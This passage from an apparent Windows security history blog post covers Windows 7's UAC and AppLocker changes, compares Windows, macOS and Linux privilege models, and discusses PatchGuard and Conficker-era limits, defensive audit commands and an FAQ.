&lt;p&gt;The auto-elevate whitelist is the surface Leo Davidson&apos;s December 2009 essay (sysprep.exe loading &lt;code&gt;CRYPTBASE.dll&lt;/code&gt; from &lt;code&gt;%SystemRoot%\System32&lt;/code&gt; after a bind directory redirection) attacked first, and the UACMe catalogue on GitHub maintained an ongoing inventory of roughly 70 distinct UAC-bypass techniques over the following decade. The exact count grows over time -- the GitHub repository is the authoritative reference -- and the order-of-magnitude figure should be read as engineering-folklore shorthand rather than as instrumented telemetry. See the &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless&lt;/a&gt; companion post for the full bypass-technique history and for the 2024 to 2026 Administrator Protection redesign.&lt;/p&gt;
&lt;p&gt;AppLocker arrived in Windows 7, replacing the Software Restriction Policies of Windows XP and Server 2003 with a richer rule-collection model: executable rules, MSI rules, script rules, packaged-app rules, and DLL rules, each authorable by path, file hash, or publisher [@s-msft-applocker-overview]. DirectAccess shipped as a pre-VPN seamless remote-access protocol -- ahead of its time and not widely deployed. The reason it was ahead of its time and the reason it failed to deploy widely were the same: DirectAccess required native IPv6 connectivity (with Teredo or 6to4 tunneling as the fallback for IPv4-only networks) and per-machine certificate enrollment for every endpoint and gateway, and in the 2009-to-2014 window most enterprises ran neither IPv6 nor a mature PKI, so the prerequisite stack alone disqualified the protocol from broad rollout.&lt;/p&gt;

Microsoft&apos;s application-control feature, first shipped in Windows 7 (and Server 2008 R2). AppLocker supersedes Software Restriction Policies with a rule-collection model spanning executables, MSIs, scripts, packaged apps, and DLLs, with each rule authorable by path, file hash, or publisher (Authenticode-signed publisher and product) [@s-msft-applocker-overview].
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vista feature&lt;/th&gt;
&lt;th&gt;Windows 7 change&lt;/th&gt;
&lt;th&gt;What the change cost or enabled&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;UAC&lt;/td&gt;
&lt;td&gt;Four-level slider; auto-elevate whitelist for signed MS binaries&lt;/td&gt;
&lt;td&gt;Less prompt fatigue; new bypass surface via whitelist abuse&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MIC + UIPI&lt;/td&gt;
&lt;td&gt;Unchanged&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ASLR + DEP&lt;/td&gt;
&lt;td&gt;Loader and policy refinements&lt;/td&gt;
&lt;td&gt;Slightly more user-image coverage; not yet mandatory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PatchGuard + KMCS&lt;/td&gt;
&lt;td&gt;Unchanged on x64&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Service Hardening&lt;/td&gt;
&lt;td&gt;Coverage extended to additional service hosts&lt;/td&gt;
&lt;td&gt;Smaller residual blast radius&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Resource Protection&lt;/td&gt;
&lt;td&gt;Unchanged&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Filtering Platform&lt;/td&gt;
&lt;td&gt;Refinements for VPN providers&lt;/td&gt;
&lt;td&gt;Cleaner third-party integration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BitLocker&lt;/td&gt;
&lt;td&gt;BitLocker To Go for removable drives&lt;/td&gt;
&lt;td&gt;Encrypted USB sticks become practical&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security Center&lt;/td&gt;
&lt;td&gt;Reborn as Action Center&lt;/td&gt;
&lt;td&gt;Aggregated maintenance + security surface&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(new) AppLocker&lt;/td&gt;
&lt;td&gt;Replaces Software Restriction Policies&lt;/td&gt;
&lt;td&gt;Richer application control for enterprises&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The argument is the obvious one. Windows 7&apos;s reception was broadly positive and Vista&apos;s reception was broadly negative running on substantially the same security architecture. This is the article&apos;s evidence that &quot;user-hostile integration of a correct architecture&quot; is a distinct failure mode from &quot;wrong architecture,&quot; and that the integration tax is payable -- if the work is done.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Vista-era integrity-level architecture is still load-bearing on Windows 11. Every modern sandbox -- browser tab process, AppContainer for a UWP app, the Office Protected View host, the Windows Defender Application Guard container -- builds on the MIC primitive Vista shipped in January 2007. If you maintain a Windows desktop fleet, treat UAC, MIC, and per-service SIDs as the foundational defenses they are, not as legacy artifacts. Companion posts: &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless&lt;/a&gt; on the integrity-level-stack arc through Administrator Protection, and &lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;Process Mitigation Policies&lt;/a&gt; on the post-era process-mitigations layer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If Windows 7 proved the architecture, the era&apos;s two structural limits proved how much was left to do. The next chapter is humility.&lt;/p&gt;
&lt;h2&gt;9. Three Operating Systems, Three Answers&lt;/h2&gt;
&lt;p&gt;Microsoft was not the only operating-system vendor trying to answer the privilege-model question in this window. The same years that produced UAC produced Mac OS X 10.5 Leopard&apos;s sandbox and mainlined SELinux on Linux. Each answered the question &quot;which operations get the elevation primitive interposed on them?&quot; with a different default.&lt;/p&gt;
&lt;h3&gt;macOS 10.5 Leopard, October 2007&lt;/h3&gt;
&lt;p&gt;Apple shipped Leopard&apos;s &quot;seatbelt&quot; sandbox in October 2007, built on Robert Watson&apos;s TrustedBSD MAC framework -- the same FreeBSD-derived Mandatory Access Control plumbing that becomes App Sandbox in OS X 10.7 (Lion, 2011) and the sandbox primitive every signed Mac App Store application now runs inside. The sandbox profile language is a Scheme dialect (SBPL); a representative four-line profile reads:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-scheme&quot;&gt;(version 1)
(deny default)
(allow file-read* (subpath &quot;/usr/lib&quot;))
(allow network-outbound (remote tcp &quot;*:443&quot;))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Apple&apos;s &lt;code&gt;authopen&lt;/code&gt; and Authorization Services APIs are closer to per-operation elevation than Vista&apos;s per-process-token model. A typical Authorization Services flow elevates a single file-modification operation -- the canonical example is editing &lt;code&gt;/private/etc/hosts&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;authopen -w /private/etc/hosts
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The macOS model is &quot;the user is prompted at the moment of the protected operation, the elevation is scoped to that operation, and the rest of the process continues at the user&apos;s normal privileges.&quot; Vista&apos;s model is &quot;the user is prompted at the moment a process needs the high token, the full token is released to the entire process, and the rest of the user session continues under the filtered token.&quot;&lt;/p&gt;
&lt;h3&gt;Linux: SELinux, AppArmor, and sudo&lt;/h3&gt;
&lt;p&gt;SELinux (originally developed by the U.S. National Security Agency, released to the open-source community in December 2000, mainlined in Linux 2.6.0 in December 2003, and championed downstream by Red Hat in RHEL 4 from February 2005 onwards) is the most thoroughly developed example of Type Enforcement on a mainstream OS. The policy language uses Access Vector rules with security labels:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-selinux&quot;&gt;allow httpd_t httpd_content_t : file { read getattr open };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The semantics are explicit: a process in domain &lt;code&gt;httpd_t&lt;/code&gt; may perform &lt;code&gt;read&lt;/code&gt;, &lt;code&gt;getattr&lt;/code&gt;, and &lt;code&gt;open&lt;/code&gt; on a file with label &lt;code&gt;httpd_content_t&lt;/code&gt;. The labels travel with the file (extended attributes on disk) and the rules live in a single compiled policy. The model is label-based MAC.&lt;/p&gt;
&lt;p&gt;AppArmor (Immunix, then Novell, mainlined in Linux 2.6.36 on October 20, 2010 [@s-linux-2-6-36-kernelnewbies]) takes the opposite philosophical position. A profile is a list of path-based rules:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-apparmor&quot;&gt;/usr/sbin/dnsmasq {
  /etc/dnsmasq.conf r,
  /var/lib/misc/dnsmasq.leases rw,
  network inet dgram,
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The model is path-based MAC: rules apply to filesystem paths rather than to inode labels. &lt;code&gt;sudo&lt;/code&gt; persists across both as the practical per-operation elevation primitive, and most production Linux deployments use a mix.&lt;/p&gt;

The SELinux-vs-AppArmor distinction is a real architectural disagreement, not a stylistic preference. Label-based MAC ties policy to the data (extended attributes follow the file) but requires that every filesystem operation preserve the labels and that the labels start correct. Path-based MAC ties policy to the file path (a path is a profile lookup key) but means the same data accessed through two different paths can get two different policy verdicts. Both forms ship in mainstream Linux distributions in 2026; the choice is usually a function of which distribution&apos;s tooling you started with.
&lt;p&gt;AppArmor&apos;s mainline Linux merge is Linux 2.6.36, October 20, 2010 [@s-linux-2-6-36-kernelnewbies]. Upstream secondary references occasionally date the mainline merge to 2009, which is wrong -- 2009 was the announcement-of-intent year; the actual &lt;code&gt;git&lt;/code&gt; merge into Linus&apos;s tree is October 20, 2010.&lt;/p&gt;
&lt;h3&gt;Three OSes, three privilege models&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;OS / year&lt;/th&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Granularity&lt;/th&gt;
&lt;th&gt;Policy authoring&lt;/th&gt;
&lt;th&gt;Origin lineage&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Vista UAC + MIC + UIPI (Jan 2007)&lt;/td&gt;
&lt;td&gt;Per-process token, integrity-level SID&lt;/td&gt;
&lt;td&gt;Per-process&lt;/td&gt;
&lt;td&gt;Manifest + UAC consent + ACL/MIC ACE&lt;/td&gt;
&lt;td&gt;Cutler-era NT access tokens + new MIC layer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Leopard sandbox + Authorization Services (Oct 2007)&lt;/td&gt;
&lt;td&gt;Per-operation profile + per-operation auth&lt;/td&gt;
&lt;td&gt;Per-operation&lt;/td&gt;
&lt;td&gt;SBPL Scheme profile + &lt;code&gt;authopen&lt;/code&gt; call&lt;/td&gt;
&lt;td&gt;TrustedBSD MAC framework&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux SELinux / AppArmor + sudo (2003 / 2010 / forever)&lt;/td&gt;
&lt;td&gt;MAC domain rules + path/label policies&lt;/td&gt;
&lt;td&gt;Per-operation via MAC + per-command via sudo&lt;/td&gt;
&lt;td&gt;AV rules / profiles / sudoers&lt;/td&gt;
&lt;td&gt;NSA / Immunix / BSD-flavour &lt;code&gt;sudo&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The point is not which model is &quot;better.&quot; Vista&apos;s UAC is structurally closer to &lt;code&gt;sudo&lt;/code&gt; than its critics admitted -- the difference is that &lt;code&gt;sudo&lt;/code&gt; is invoked explicitly by the user from a shell, while UAC interposes on operations the user expected to just work. The contrast is about &lt;em&gt;which operations the platform forces through the elevation primitive&lt;/em&gt;, and operating systems that pick different answers end up with different reception narratives even when the underlying mechanisms are similar.&lt;/p&gt;
&lt;p&gt;If the privilege model is choosable -- if reasonable operating systems pick different answers -- what are the structural limits NONE of the three could escape? That is the next chapter.&lt;/p&gt;
&lt;h2&gt;10. Theoretical Limits and Era-Specific Lessons&lt;/h2&gt;
&lt;p&gt;Four structural limits the era revealed. Three of the four were proved in the literature; one was proved by Conficker. None of the four were closed by 2009. Two are closed today; two are not.&lt;/p&gt;
&lt;h3&gt;Limit 1: The same-privilege paradox&lt;/h3&gt;
&lt;p&gt;PatchGuard runs at ring 0. Rootkits run at ring 0. PatchGuard is therefore fundamentally bypassable from a sufficiently privileged attacker -- and skape and Skywing&apos;s December 1, 2005 &lt;em&gt;Uninformed&lt;/em&gt; paper demonstrated three concrete bypass technique classes against the v1 implementation [@s-skape-skywing-patchguard]. PatchGuard v2 (Vista RTM) and v3 (Vista SP1) patched the specific v1 bypasses but could not address the structural issue. The genuine architectural fix waits for Hypervisor-Protected Code Integrity in Windows 10 Anniversary Update (August 2016) and for the VBS, Pluton, and Secured-core PC architectures of Windows 11. All out of era. Part 4 of this series traces them.&lt;/p&gt;
&lt;h3&gt;Limit 2: The deployment-velocity ceiling (the Conficker bound)&lt;/h3&gt;
&lt;p&gt;Aggregate installed-base security is bounded by patch-to-field-deployment latency on the slowest cohort, not by patch-release latency. Conficker&apos;s 9-to-15-million infections in early 2009 exploited a vulnerability that had been patched for one to four months across the variants [@s-cwg-lessons-learned-2019].&lt;/p&gt;
&lt;p&gt;This is the era-closing operational lesson. It motivates Automatic Updates becoming opt-out-by-default (XP SP2, 2004), the mature Patch Tuesday cadence, and -- much later -- the Windows-as-a-Service cumulative-update model of Windows 10 that removes the user&apos;s ability to decline updates indefinitely. All-cohort closure remains structurally unattainable as of 2026; this is the era&apos;s defining residual.&lt;/p&gt;

The structural upper bound on aggregate installed-base security set by patch-to-field-deployment latency on the slowest cohort of machines. A vulnerability becomes safe at population scale only when the patch has propagated to every reachable system, and the slowest cohort&apos;s propagation rate dominates the aggregate. Conficker proved that on-by-default architectural mitigations on Vista did not raise the ceiling for the XP and Server 2003 installed base; only patch propagation could. The post-era architectural response is the Windows 10 cumulative-update model.
&lt;h3&gt;Limit 3: The compatibility tax on defaults&lt;/h3&gt;
&lt;p&gt;Every Vista security default that broke an application became a UAC bypass surface (the auto-elevate whitelist), a driver-signing escape hatch (test-signing), or a compatibility shim (DEP OptIn). Defaults that cannot break shipping software cannot be tightened. This is the era&apos;s productive failure mode -- it explains why post-Vista security features ship with deprecation runways: mandatory ASLR took until Windows 10 to fully land, mandatory KMCS on x86 never landed at all, and Driver Signature Enforcement on x64 had to coexist with the test-signing escape hatch for the foreseeable future.&lt;/p&gt;
&lt;h3&gt;Limit 4: The user-hostility tax on correct architecture&lt;/h3&gt;
&lt;p&gt;UAC was architecturally correct and operationally hated. The Mojave Experiment (July 2008) is the era&apos;s confession that the perceptual layer matters as much as the architectural layer. Windows 7&apos;s smoothing is the article&apos;s evidence that the tax can be paid, if the work is done -- but it has to be paid every time, because the perceptual layer is not learned-once. Windows 8&apos;s Modern UI, Windows 11&apos;s UAC behaviour adjustments, and the 2024-to-2026 &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Administrator Protection&lt;/a&gt; redesign are all replays of the same question on different sets of users.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The era&apos;s binding constraints were not the UI. They were architectural -- you cannot defend ring 0 from ring 0, and skape and Skywing proved this in December 2005 -- and operational -- you cannot patch the slowest cohort faster than the worm cadence, and Conficker proved this in late November 2008. The prompt was the symptom. The constraints were the disease. Both were unsolved when Windows 7 shipped.&lt;/p&gt;
&lt;/blockquote&gt;

The Conficker Working Group&apos;s June 2010 post-mortem named the binding constraint directly: it is not whether a patch exists, but whether deployment reaches the slowest cohort before the worm does [@s-cwg-lessons-learned-2019].
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Era limit&lt;/th&gt;
&lt;th&gt;Era-end state (Oct 2009)&lt;/th&gt;
&lt;th&gt;2026 state&lt;/th&gt;
&lt;th&gt;Forward link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Same-privilege paradox&lt;/td&gt;
&lt;td&gt;OPEN&lt;/td&gt;
&lt;td&gt;CLOSED for kernel integrity via HVCI / VBS / Pluton&lt;/td&gt;
&lt;td&gt;Part 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment-velocity ceiling&lt;/td&gt;
&lt;td&gt;OPEN&lt;/td&gt;
&lt;td&gt;NARROWED via Windows-as-a-Service cumulative updates&lt;/td&gt;
&lt;td&gt;Part 3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compatibility tax on defaults&lt;/td&gt;
&lt;td&gt;OPEN (per-feature deprecation runways)&lt;/td&gt;
&lt;td&gt;OPEN; managed via mitigation slow-ramp deployment&lt;/td&gt;
&lt;td&gt;Part 3, Part 4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User-hostility tax on correct architecture&lt;/td&gt;
&lt;td&gt;OPEN (Windows 7 smoothed Vista)&lt;/td&gt;
&lt;td&gt;RECURRING (re-paid each major release)&lt;/td&gt;
&lt;td&gt;Part 6&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;If the era closed with two structural limits unsolved, what stayed open for the next decade to answer?&lt;/p&gt;
&lt;h2&gt;11. Open Problems at the End of the Era&lt;/h2&gt;
&lt;p&gt;Stand at an engineer&apos;s desk on Friday, October 23, 2009 -- the day after Windows 7 GA. The previous twelve months had shipped a polished consumer OS, contained Conficker (mostly), and formed an industry-coordination body for the next worm. What does the agenda look like on Monday?&lt;/p&gt;
&lt;h3&gt;Q1: How do you make the patching cadence faster than the worm cadence?&lt;/h3&gt;
&lt;p&gt;The era-end answer was a mature Patch Tuesday cadence plus the Microsoft Active Protections Program (MAPP, which gave AV vendors early access to patch details) plus Automatic Updates default-on, but the slowest-cohort lag remained. The post-era answer is the cumulative-update and Windows-as-a-Service model of Windows 10 (July 2015) plus enterprise WSUS scale-out plus the out-of-band cadence the era proved was sometimes necessary. The in-era out-of-band releases were three: the bulletin commonly cited from January 2006 patching the Windows Metafile vulnerability (MS06-001) [@s-msft-ms06-001], the April 2007 out-of-band patching the animated-cursor (.ANI) GDI parsing vulnerability (MS07-017) [@s-msft-ms07-017], and MS08-067 [@s-ms08-067].&lt;/p&gt;
&lt;p&gt;The April 2004 LSASS bulletin (the patch that preceded Sasser) was a regular Patch Tuesday release on April 13, 2004 [@s-msft-ms04-011], not an out-of-band release. The in-era out-of-band Microsoft Security Bulletins for wormable-class or actively-exploited-class RCEs are three: the January 2006 Windows Metafile bulletin (MS06-001) [@s-msft-ms06-001], the April 3, 2007 animated-cursor (.ANI) GDI bulletin (MS07-017, patching CVE-2007-0038, which was being actively exploited via drive-by web pages) [@s-msft-ms07-017], and MS08-067 in October 2008 [@s-ms08-067]. The May 8, 2007 Windows DNS RPC RCE bulletin (MS07-029) is sometimes misremembered as an out-of-band release; it shipped on the regular Patch Tuesday cadence [@s-msft-secupdates-index].&lt;/p&gt;
&lt;p&gt;The architectural shift the era did not make is the one Windows 10 made: removing the user&apos;s ability to indefinitely decline updates on consumer machines. This was politically impossible in 2009 and remains contested in 2026; deferred to Part 3.&lt;/p&gt;
&lt;h3&gt;Q2: How do you protect kernel integrity from kernel-level attackers?&lt;/h3&gt;
&lt;p&gt;Era-end answer: PatchGuard runs at the same ring as the attacker; structural bypassability remains. Post-era answer: Hypervisor-Protected Code Integrity in Windows 10 Anniversary Update (August 2016); Virtualization-Based Security and Credential Guard; the Microsoft Vulnerable Driver Block list (2020 onward) for the BYOVD afterlife. Deferred to Part 4.&lt;/p&gt;
&lt;h3&gt;Q3: How do you separate trust principals more finely than user accounts and integrity levels?&lt;/h3&gt;
&lt;p&gt;Era-end answer: MIC offered five integrity levels; the granularity is per-process, not per-capability. Post-era answer: AppContainer (Windows 8, which introduces capability SIDs inside a LowBox token so a process can be denied or granted individual platform capabilities such as &lt;code&gt;internetClient&lt;/code&gt; independently of its user account); the Modern Apps and Universal Windows Platform manifest-permission model (declarative capability gating at app install time, with the manifest itself authored alongside the app and reviewed at Store submission); and the Windows Subsystem for Linux and Android trust-isolation architectures (per-distribution and per-app isolation contracts that scope filesystem, network, and IPC access to a single guest OS instance). The integrity-level primitive remains the substrate every one of these builds on. Deferred to Part 3 and Part 4.&lt;/p&gt;
&lt;h3&gt;Q4: How do you ship a security architecture without breaking the user experience?&lt;/h3&gt;
&lt;p&gt;Era-end answer: Windows 7&apos;s polish proves it can be done for one release. Post-era answer: it recurred with Windows 8&apos;s Modern UI debacle, the Windows 11 UAC behaviour adjustments, and the 2024 to 2026 Administrator Protection rollout that finally promotes UAC to a security-boundary classification -- traced in the &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless&lt;/a&gt; companion post. The question is recurring -- it is solved per-release, not in principle.&lt;/p&gt;

Part 3 picks up the morning after Windows 7 GA with Stuxnet, Operation Aurora, the Enhanced Mitigation Experience Toolkit, and the Process Mitigations era. Part 4 traces the VBS / HVCI / Pluton / Secured-core PC arc that closes the same-privilege paradox. Part 5 covers the credential-theft and Active Directory escalation era (Mimikatz, Pass-the-Hash, the Protected Users group, Credential Guard). Part 6 covers the Administrator Protection redesign and the long arc back to UAC as a security boundary. The shared spine of all five remaining articles is the integrity-level stack Vista shipped.
&lt;p&gt;Four questions on the Monday whiteboard. Three of the four have answers in Parts 3 through 6 of this series. The fourth will outlast the operating system.&lt;/p&gt;
&lt;h2&gt;12. Reading 2002 to 2008 Windows Documentation in 2026&lt;/h2&gt;
&lt;p&gt;If you inherit a Vista- or Server 2008-era environment in 2026, or maintain a kernel driver whose support matrix still includes the Vista lineage, or pick up Russinovich, Solomon, and Ionescu&apos;s &lt;em&gt;Windows Internals&lt;/em&gt;, 5th edition [@s-windows-internals-5e] off the shelf, what should you know that the documentation will not tell you directly?&lt;/p&gt;
&lt;h3&gt;Reading a &lt;code&gt;whoami /groups /priv&lt;/code&gt; output on a Vista-or-later machine&lt;/h3&gt;
&lt;p&gt;The split-token model means the elevated and unelevated tokens differ in their group memberships and privilege lists, not in a single flag. The integrity-level SID line -- &lt;code&gt;Mandatory Label\Medium Mandatory Level&lt;/code&gt; or &lt;code&gt;Mandatory Label\High Mandatory Level&lt;/code&gt; -- is the right place to look first. Practitioner tip: if the integrity label says High and the privilege list shows &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; enabled, the token is elevated. If the integrity label says Medium and the privilege list lacks &lt;code&gt;SeBackupPrivilege&lt;/code&gt; and &lt;code&gt;SeTakeOwnershipPrivilege&lt;/code&gt;, the token is filtered. The Microsoft Learn &lt;code&gt;windows/win32/secauthz/mandatory-integrity-control&lt;/code&gt; page is the canonical integrity-level reference [@s-msft-mic-win32].&lt;/p&gt;
&lt;h3&gt;Reading a Security event-log entry from this era&lt;/h3&gt;
&lt;p&gt;The Event ID schema changed between XP (5xx range) and Vista (4xxx range); a Vista Event 4624 logon-success entry is not the same as an XP Event 528. The Microsoft Learn &lt;code&gt;windows-security/threat-protection/auditing/&lt;/code&gt; index is the canonical reference for Vista-and-later events. The closest thing to a canonical XP-to-Vista mapping table that Microsoft still publishes is the &lt;code&gt;Appendix L: Events to Monitor&lt;/code&gt; page in the Windows Server / Active Directory documentation, whose &quot;Current Windows Event ID&quot; and &quot;Legacy Windows Event ID&quot; columns map post-Vista 4xxx-range identifiers back to their pre-Vista 5xx-range equivalents -- for example, 4624 successful logon mapping to 528/540, 4625 failed logon mapping to 529-537/539, 4634 logoff (kernel-generated when the logon session is destroyed) mapping to 538, 4647 user-initiated logoff mapping to 551, and 1102 audit log cleared mapping to 517 -- for practitioners inheriting mixed XP-and-Vista log estates [@s-msft-events-to-monitor]. Old documentation that uses the 5xx-range numbering is talking about XP and Server 2003.&lt;/p&gt;
&lt;h3&gt;Reading the MS-bulletin archive&lt;/h3&gt;
&lt;p&gt;The original &lt;code&gt;microsoft.com/technet/security/bulletin/MS08-067.mspx&lt;/code&gt; URL scheme has migrated twice. The current canonical form is &lt;code&gt;learn.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067&lt;/code&gt; [@s-ms08-067]. The parent landing URL &lt;code&gt;learn.microsoft.com/en-us/security-updates/&lt;/code&gt; is the working index [@s-msft-secupdates-index]; the legacy &lt;code&gt;/securitybulletins/&lt;/code&gt; URL returns HTTP 404 in 2026 and is one of the reasons cross-references in older books need patient redirection.&lt;/p&gt;
&lt;h3&gt;Identifying an era-shaped misconfiguration in a modern audit&lt;/h3&gt;
&lt;p&gt;Three worked examples readers can run on a Windows 10 or 11 fleet today.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;A service running as &lt;code&gt;LocalSystem&lt;/code&gt; instead of as its per-service SID. The service inventory in &lt;code&gt;sc.exe qc&lt;/code&gt; output or &lt;code&gt;Get-Service | ForEach-Object&lt;/code&gt; queries should show &lt;code&gt;NT SERVICE\&amp;lt;servicename&amp;gt;&lt;/code&gt; in the principal column for any post-Vista service; if it shows &lt;code&gt;LocalSystem&lt;/code&gt;, the service is either pre-Vista in its configuration or has been deliberately escalated. Either case warrants explanation.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;An unsigned third-party kernel driver loading via the test-signing escape hatch (&lt;code&gt;bcdedit /set testsigning on&lt;/code&gt;). Test-signing should never be enabled on production machines; the desktop watermark exists exactly to make this visible. The audit query is &lt;code&gt;bcdedit /enum {current} | findstr testsigning&lt;/code&gt; from an elevated prompt.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;A BitLocker volume without TPM+PIN protection on a system whose threat model includes physical access. TPM-only mode is vulnerable to the cold-boot attack documented in Halderman et al., USENIX Security 2008 [@s-halderman-coldboot-jhalderm]. The query is &lt;code&gt;manage-bde -protectors -get C:&lt;/code&gt; from an elevated prompt; the output should list a numerical password recovery key plus a TPM+PIN protector for any laptop that leaves the office.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;bcdedit /set testsigning on&lt;/code&gt; is documented for driver development. It is not appropriate for production systems. A production machine with test-signing enabled accepts kernel drivers signed by certificates the system does not normally trust -- exactly the rootkit-installation path Vista x64&apos;s mandatory KMCS was designed to close [@s-msft-driver-signing]. Audit for the watermark and for the &lt;code&gt;bcdedit&lt;/code&gt; value; if either is present on a server or end-user machine, treat it as a finding.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The reading list&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Parts 3 through 6 of this series each pick up where this one ends: - Part 3: Stuxnet, Operation Aurora, the Enhanced Mitigation Experience Toolkit, the cumulative-update model - Part 4: VBS, HVCI, Pluton, Secured-core PC, the closure of the same-privilege paradox - Part 5: Credential theft, Mimikatz, Pass-the-Hash, Credential Guard - Part 6: Administrator Protection and the long arc back to UAC as a security boundary Companion posts: &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;Windows Access Control: 25 Years of Attacks&lt;/a&gt;, &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless&lt;/a&gt;, &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker on Windows&lt;/a&gt;, &lt;a href=&quot;https://paragmali.com/blog/beyond-bitlocker-the-three-file-level-encryption-layers-micr/&quot; rel=&quot;noopener&quot;&gt;Beyond BitLocker&lt;/a&gt;, &lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;Process Mitigation Policies&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

Given the line `Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192` and a privilege list that includes `SeShutdownPrivilege Enabled`, `SeChangeNotifyPrivilege Enabled`, `SeUndockPrivilege Enabled`, `SeTimeZonePrivilege Enabled` -- and that does NOT include `SeLoadDriverPrivilege`, `SeBackupPrivilege`, `SeTakeOwnershipPrivilege`, or `SeDebugPrivilege` -- the token is the filtered standard-user token. The user is an administrator interactively logged on, but the running shell is operating with the filtered token. To verify, open an elevated PowerShell from the same session and re-run `whoami /groups /priv`: the integrity label will read `High Mandatory Level`, the SID will be `S-1-16-12288`, and the elevated privilege set will be present.
&lt;p&gt;The era is closed. The architecture is not.&lt;/p&gt;
&lt;h2&gt;13. Frequently Asked Questions&lt;/h2&gt;
&lt;p&gt;Eight common misconceptions about the era, each anchored to a corrected primary source.&lt;/p&gt;

No. PatchGuard shipped first in Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition in April 2005 -- twenty months before Vista RTM. Vista x64 inherited PatchGuard v2; Vista SP1 shipped v3. The cite-ready primary is Microsoft Security Advisory 932596, which states explicitly that PatchGuard is &quot;included with x64-based Windows operating systems&quot; and reads back through XP x64 and Server 2003 x64 [@s-msft-adv-932596]. x86 editions of Vista never received PatchGuard at all.

